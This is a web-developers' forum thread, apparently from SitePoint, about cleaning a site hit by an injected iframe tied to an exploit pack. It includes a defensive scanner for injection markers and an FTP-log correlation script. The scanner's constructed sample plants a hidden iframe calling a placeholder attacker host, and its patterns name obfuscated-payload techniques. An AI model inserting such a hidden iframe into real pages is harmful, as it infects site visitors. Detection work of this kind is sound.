  1. #1 McStompin (SitePoint Zealot, Wisconsin, U.S.)

    I think I have a virus.

    [Attachment: virus.PNG]
    It would appear as though one of my sites has been attacked. When I enter the site, my antivirus (AVG) displays the picture above.


    When it comes to web development, I would say I have a lot to learn so I would greatly appreciate any input or advice on this matter.
    A community environment where web designers can share their work:
    RateMyWebPage.net
    Check out and review some new and unique websites or submit your own

  2. #2 thewebhostingdir (Non-Member)
    Please check the PHP file show.php on the server. It may have the iframe code injected into it with some lengthy and spuriously encoded strings. Kindly check and let us know if this was the case.

  3. #3 McStompin (SitePoint Zealot, Wisconsin, U.S.)
    I took a look and I don't believe I have a show.php in any of my directories. The URL in the attached picture isn't my own. It almost seems like a virus is tunneling through from another site. I have no clue where to start with this one.
    A community environment where web designers can share their work:
    RateMyWebPage.net
    Check out and review some new and unique websites or submit your own

  4. #4 thewebhostingdir (Non-Member)
    There must be malware content/iframes added to the website which you are browsing, the website where you get the show.php file in the URL.

  5. #5 (SitePoint Enthusiast)
    First don't do it in your browser, or at least disable JavaScript and Flash.

    You can start with Google's Safe Browsing Diagnostics: http://www.google.com/safebrowsing/d...ww.example.com (replace www.example.com with your own site address). It will show whether Google found anything suspicious on your site.

    Then you can analyze HTML/script code of your files on server. They should not contain anything that you didn't put there.

    Then scan your server for any suspicious/new files and directories.

    Then look through web server configuration. There could be unwanted redirects and error pages.

    You might also want to take a look at my online tool called Unmask Parasites: http://www.UnmaskParasites.com . It analyzes the HTTP response and HTML code of web pages and highlights suspicious code (links, scripts, iframes and redirects). Google's Safe Browsing information is also included in Unmask Parasites results. Note that the tool is still in beta and may not detect every security problem.
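    The two server-side steps in the post above (look through your own HTML/script files for code you did not put there, and list files that are new or recently changed) can be done with a small script run on the web root. The following is an added example written for this thread, not a tool from the post or from Unmask Parasites. The patterns it looks for are generic markers of drive-by injection (hidden or unexpected iframes, `eval(base64_decode(...))` in PHP, `document.write(unescape(...))` in JavaScript); the two-site directory it scans is constructed inline for the demo, and the iframe hostname in it is a placeholder.

```python
"""Scan a web root for injected iframes / obfuscated script and list files
modified recently. Added example for this thread, not the poster's tool.
The sample site built by build_sample_site() is constructed for the demo."""
import os
import re
import time
import tempfile

# Generic markers of the kind of injection described in the thread: a hidden
# iframe or an obfuscated script appended to index files.
SUSPICIOUS_PATTERNS = {
    # an iframe sized 0/1 px or hidden by CSS, typical of drive-by injection
    "hidden_iframe": re.compile(
        r"<iframe\b[^>]*?(?:\b(?:width|height)\s*=\s*[\"']?[01]\b"
        r"|visibility\s*:\s*hidden|display\s*:\s*none)", re.I),
    # any iframe at all: worth a look on a site that does not use them
    "iframe": re.compile(r"<iframe\b", re.I),
    # PHP that decodes and executes a hidden payload
    "php_eval_decode": re.compile(
        r"eval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    # JavaScript that writes HTML from an escaped / char-coded string
    "js_obfuscated_write": re.compile(
        r"document\.write\s*\(\s*unescape\s*\(|String\.fromCharCode\s*\(", re.I),
}
TEXT_EXTENSIONS = {".php", ".html", ".htm", ".js", ".inc", ".tpl"}


def scan_file(path):
    """Return a list of (pattern_name, line_number, snippet) hits for one file."""
    hits = []
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            for name, pattern in SUSPICIOUS_PATTERNS.items():
                if pattern.search(line):
                    hits.append((name, lineno, line.strip()[:80]))
    return hits


def scan_tree(root, recent_days=7):
    """Walk root; return {'hits': {relpath: [...]}, 'recent': [relpath, ...]}.
    'recent' lists files modified within recent_days, the ones to compare
    against FTP logs and your own change history."""
    cutoff = time.time() - recent_days * 86400
    hits, recent = {}, []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            rel = os.path.relpath(full, root)
            if os.path.getmtime(full) >= cutoff:
                recent.append(rel)
            if os.path.splitext(fname)[1].lower() in TEXT_EXTENSIONS:
                found = scan_file(full)
                if found:
                    hits[rel] = found
    return {"hits": hits, "recent": sorted(recent)}


# --- constructed sample site for a stand-alone run --------------------------
CLEAN_INDEX = "<html><body><h1>Welcome</h1><p>Nothing injected here.</p></body></html>\n"
INJECTED_INDEX = (
    "<?php echo 'site'; ?>\n"
    "<html><body><h1>Welcome</h1></body></html>\n"
    # injected line appended after the real markup (hostname is a placeholder)
    '<iframe src="http://ATTACKER-HOST.invalid/show.php" width="1" height="1" '
    'style="visibility:hidden"></iframe>\n'
)


def build_sample_site(root):
    """Create two sites under root: siteA clean and 30 days old, siteB injected today."""
    os.makedirs(os.path.join(root, "siteA"))
    os.makedirs(os.path.join(root, "siteB"))
    clean = os.path.join(root, "siteA", "index.html")
    bad = os.path.join(root, "siteB", "index.php")
    with open(clean, "w") as fh:
        fh.write(CLEAN_INDEX)
    with open(bad, "w") as fh:
        fh.write(INJECTED_INDEX)
    old = time.time() - 30 * 86400          # backdate the clean file
    os.utime(clean, (old, old))
    return root


def demo():
    """Build the constructed sample site in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_tree(build_sample_site(tmp))


if __name__ == "__main__":
    report = demo()
    for path, findings in report["hits"].items():
        for name, lineno, snippet in findings:
            print(f"{path}:{lineno}: {name}: {snippet}")
    print("recently modified:", report["recent"])
```

    On a real server you would call scan_tree() on the document root instead of demo(). A hit is a prompt to read the file, not proof of infection: a site that legitimately embeds a video iframe will trip the "iframe" rule, which is why the hidden-iframe and eval/decode rules are kept separate.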

  6. #6 (SitePoint Enthusiast)
    The first question is: how did the malicious software get there? Was it your code or was it the web host not doing the job?

    FTP in, figure out if you have any security vulns in your code. If you are using somebody else's software make sure you have the latest version. Contact the developer, etc.

    If you have vulns in your code, fix them. If not, upload fresh copies of everything from backup to make sure all infections are removed. Then send a message to your web host with all the info. Demand that they take action to stop future hacking attempts.

    Change all the passwords on all of the accounts connected to whatever was attacked. Database passwords, etc.

    Go beyond what your minimal requirement is so this never happens to you again.

  7. #7 Crazybanana (SitePoint Wizard)
    Your webpage has been exploited with the "la fiesta" (also named "31 fiesta" or "37 fiesta") exploit pack.

    This pack contains 25+ exploits and targets Yahoo Messenger, Adobe Reader, QuickTime, DivX, MSDAC and various ActiveX controls.

    If you run some CMS, forums or other software, try to look for updates, but first you have to clean your server properly.

    Check all folders and files for suspicious names etc., and pay attention to plugins and folders containing plugins, as they are a popular place to store malicious files.

    This iframe you have there will trigger various exploits on everyone that visits and will try to infect as many as possible, so take action as soon as possible.

    Good Luck
    Who's to doom when the judge himself is dragged before the bar


  8. #8 McStompin (SitePoint Zealot, Wisconsin, U.S.)
    Well, I believe the problem is fixed now. I have multiple web sites in one directory and every index.php and index.html had some "woocasino" iframe code in it. I deleted the code in all the files I found it in and the problem seems to be gone.

    Thank you everyone for your help. I really appreciate it. I didn't even know what an iframe was until now! Also, thanks for the link, Ayme.

    This is very disturbing because I have no idea how it happened in the first place and I fear it may come back. I'll post again if it does. The last thing I want is for any of my visitors to get malicious code because of one of my sites, or to get my sites plagued with warning marks on search engines like Google.

    Thanks again!
    A community environment where web designers can share their work:
    RateMyWebPage.net
    Check out and review some new and unique websites or submit your own

  9. #9 (Community Advisor, UK)
    A lot of website injection attacks are now done via ftp (username and passwords are network sniffed by an infection on a user's pc) so you should check ftp logs against file modification times, and change your ftp login and virus scan any pc that has been used to access your ftp account.
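    The check suggested in the post above (FTP logs against file modification times) is worth doing mechanically, because on a shared host with several sites in one directory the injected files are easy to miss by eye. The script below is an added example written for this thread, not code from the post. It assumes a vsftpd-style log line layout; the log lines, the file timestamps and the "known" client address are all constructed for the demo. It flags uploads from a client address you do not recognise (the sniffed-password case described above) and, in the other direction, files whose modification time matches no FTP upload at all, which points to a web-application hole rather than a stolen FTP login.

```python
"""Correlate FTP upload log entries with file modification times.
Added example for this thread, not from the post. Log lines and timestamps
are constructed; the line layout follows vsftpd's transfer log."""
import re
from datetime import datetime, timedelta

# vsftpd-style upload record (constructed sample, not a real log):
# Tue Sep  8 03:12:40 2009 [pid 4321] [webuser] OK UPLOAD: Client "203.0.113.9", "/siteB/index.php", 2048 bytes, 12.30Kbyte/sec
UPLOAD_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]+)\] OK UPLOAD: Client "(?P<ip>[^"]+)", "(?P<path>[^"]+)"'
)


def parse_upload(line):
    """Return a dict for an OK UPLOAD line, or None for any other record."""
    m = UPLOAD_RE.match(line)
    if not m:
        return None
    # vsftpd pads single-digit days with a second space; collapse it before parsing
    ts = datetime.strptime(re.sub(r"\s+", " ", m.group("ts")), "%a %b %d %H:%M:%S %Y")
    return {"time": ts, "user": m.group("user"), "ip": m.group("ip"), "path": m.group("path")}


def correlate(log_lines, file_mtimes, known_ips, window=timedelta(minutes=5)):
    """Return findings as (kind, path, client_ip, time) tuples.

    kind is 'upload_from_unknown_ip' when an FTP upload came from an address
    not in known_ips, or 'modified_without_ftp_upload' when a changed file has
    no upload within `window` of its mtime (so FTP was not the way in)."""
    uploads = [u for u in map(parse_upload, log_lines) if u]
    findings = []
    for u in uploads:
        if u["ip"] not in known_ips:
            findings.append(("upload_from_unknown_ip", u["path"], u["ip"], u["time"]))
    for path, mtime in file_mtimes.items():
        matched = [u for u in uploads
                   if u["path"] == path and abs(u["time"] - mtime) <= window]
        if not matched:
            findings.append(("modified_without_ftp_upload", path, None, mtime))
    return findings


# --- constructed sample data ------------------------------------------------
SAMPLE_LOG = [
    'Mon Sep  7 09:00:10 2009 [pid 4001] [webuser] OK LOGIN: Client "198.51.100.20"',
    'Mon Sep  7 09:01:02 2009 [pid 4001] [webuser] OK UPLOAD: Client "198.51.100.20", "/siteA/about.html", 1400 bytes, 10.00Kbyte/sec',
    'Tue Sep  8 03:12:33 2009 [pid 4321] [webuser] OK LOGIN: Client "203.0.113.9"',
    'Tue Sep  8 03:12:40 2009 [pid 4321] [webuser] OK UPLOAD: Client "203.0.113.9", "/siteB/index.php", 2048 bytes, 12.30Kbyte/sec',
    'Tue Sep  8 03:12:41 2009 [pid 4321] [webuser] OK UPLOAD: Client "203.0.113.9", "/siteA/index.html", 1900 bytes, 12.30Kbyte/sec',
]
# what `stat` would report for the files on the server (constructed)
SAMPLE_MTIMES = {
    "/siteA/about.html": datetime(2009, 9, 7, 9, 1, 2),
    "/siteB/index.php": datetime(2009, 9, 8, 3, 12, 40),
    "/siteA/index.html": datetime(2009, 9, 8, 3, 12, 41),
    "/siteB/config.php": datetime(2009, 9, 8, 3, 15, 0),   # changed, but never uploaded over FTP
}
KNOWN_IPS = {"198.51.100.20"}   # the site owner's own address (constructed)


if __name__ == "__main__":
    for kind, path, ip, when in correlate(SAMPLE_LOG, SAMPLE_MTIMES, KNOWN_IPS):
        print(f"{when:%Y-%m-%d %H:%M:%S}  {kind:28}  {path}  {ip or ''}")
```

    Feed it the real transfer log and a `find` listing of recently modified files and the same two questions fall out: did someone else use my FTP login, and did anything change that FTP cannot account for? The second case is the one where changing the FTP password alone will not help.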

